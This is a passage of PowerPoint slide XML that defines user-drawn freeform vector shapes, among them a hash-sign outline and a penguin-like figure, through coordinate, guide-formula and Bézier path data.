            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5261" y="3298"/>
                <a:ext cx="188" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 188"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 142 w 188"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 131 w 188"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 134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4 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 188"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 188"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 188"/>
                  <a:gd name="T37" fmla="*/ 84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4 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110 w 188"/>
                  <a:gd name="T65" fmla="*/ 134 h 218"/>
                  <a:gd name="T66" fmla="*/ 121 w 188"/>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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188"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Freeform 216"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5478"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0" name="Freeform 217"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5904" y="3292"/>
                <a:ext cx="82"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419"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="0"/>
              <a:ext cx="5890" cy="3541"/>
              <a:chOff x="1951" y="0"/>
              <a:chExt cx="5890" cy="3541"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1349" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6051"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220"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="62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221"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="639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222"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6547"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223"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6744"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Freeform 224"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6893"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225"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7043"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Freeform 226"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7192"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227"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7340"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3"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228"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="753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229"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7686"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230"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5672" y="3284"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 81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2 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129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7 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 66 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 48 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59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9"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="81" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="200"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>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10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="35" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="160" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160"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50"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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4" y="72"/>
                      <a:pt x="91" y="75"/>
                      <a:pt x="87" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="99"/>
                      <a:pt x="57" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="141"/>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="38" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="37"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70" y="170"/>
                      <a:pt x="69" y="173"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="196"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="98"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107"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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="41"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="44"/>
                      <a:pt x="87" y="46"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>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7"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97"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6"/>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231"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5762" y="3343"/>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232"/>
              <p:cNvSpPr>
                <a:spLocks/>
